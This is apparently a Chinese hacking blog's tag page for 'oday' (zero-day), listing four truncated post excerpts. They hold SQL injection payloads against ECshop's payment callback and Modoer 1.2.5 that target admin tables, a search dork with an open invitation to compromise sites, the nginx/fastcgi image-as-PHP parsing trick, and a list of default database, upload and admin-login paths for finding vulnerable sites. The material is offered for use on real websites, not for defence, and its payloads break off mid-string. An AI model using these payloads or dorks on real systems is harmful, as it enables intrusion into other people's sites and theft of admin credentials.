标签: oday

4 篇文章

ECshop支付方式0day及EXP
原漏洞分析:http://www.hackline.net/a/news/ldfb/web/2011/0105/7877.html respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7…
Modoer 1.2.5 SQL 0day
演示站点:http://www.xxxxx.com 关键字:Powered by Modoer site:.com (可以根据需求自行拿站) 测试漏洞: ajax.php?action=digg&idtype=shop&keyid=* FROM modoer_admin Where id=1 and substring((Select adminname FROM modoer_a…
nginx解析漏洞利用
那么假设存在一个http://www.target.com/jpg.jpg,我们以如下的方式去访问 http://www.target.com/jpg.jpg/php.php 将会得到一个URL /jpg.jpg/php.php 经过location指令,该请求将会交给后端的fastcgi处理,nginx为其设置环境变量SCRIPT_FILENAME,内容为 /scripts/jpg.jpg/ph…
默认漏洞关键字整理
默认数据库: Databases/myszw.mdb、Databases/myszw1.mdb 上传:upload_Photo.asp?PhotoUrlID=3、upload_Photo.asp?PhotoUrlID=1 关键字:网站建设公司企业网站管理系统 后缀:admin/login.asp 关键字:网梦购物系统 gCS<iBT   7 工具:挖掘鸡 后缀:/admin/login.as…